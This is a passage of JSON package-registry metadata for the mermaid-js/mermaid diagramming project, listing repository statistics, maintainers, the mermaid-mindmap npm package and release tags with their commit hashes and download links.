:17:51.507Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":5,"rankings":{"downloads":null,"dependent_repos_count":2.3083009638900878,"dependent_packages_count":3.672133505970364,"stargazers_count":0.013551985725241703,"forks_count":0.0638585994022753,"docker_downloads_count":null,"average":1.514461263746992},"purl":"pkg:golang/github.com/mermaid-js/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/mermaid-js/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/mermaid-js/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/mermaid-js/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fmermaid-js%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fmermaid-js%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fmermaid-js%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fmermaid-js%2Fmermaid/related_packages","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":1952122,"maintainers_count":0,"namespaces_count":741275,"keywords_count":109185,"github":"golang","metadata":{"funded_packages_count":49011},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2025-09-05T05:14:06.439Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":5321394,"name":"@mermaid-js/mermaid-mindmap","ecosystem":"npm","description":"Mindmap diagram module for MermaidJS.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","mindmap","mermaid"],"namespace":"mermaid-js","versions_count":11,"first_release_published_at":"2022-10-11T07:25:48.887Z","latest_release_published_at":"2022-12-15T09:20:11.504Z","latest_release_number":"9.3.0","last_synced_at":"2025-09-04T13:31:05.835Z","created_at":"2022-10-13T00:38:48.882Z","updated_at":"2025-09-04T13:31:05.835Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/mermaid-mindmap","install_command":"npm install @mermaid-js/mermaid-mindmap","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"9.3.0-rc1","latest":"9.3.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2024-04-13T18:33:07.000Z","size":230370,"stargazers_count":66655,"open_issues_count":923,"forks_count":5722,"subscribers_count":632,"default_branch":"develop","last_synced_at":"2024-04-13T21:00:44.868Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2024-04-15T07:05:02.865Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":5515,"total_committers":513,"mean_commits":"10.750487329434698","dds":0.8814143245693563,"last_synced_commit":"56ec1ab52ce15ca7dbe76a3acbe1cb68acb13b2d"},"previous_names":["knsv/mermaid"],"tags_count":137,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":218151355,"owners_count":16285515,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_pars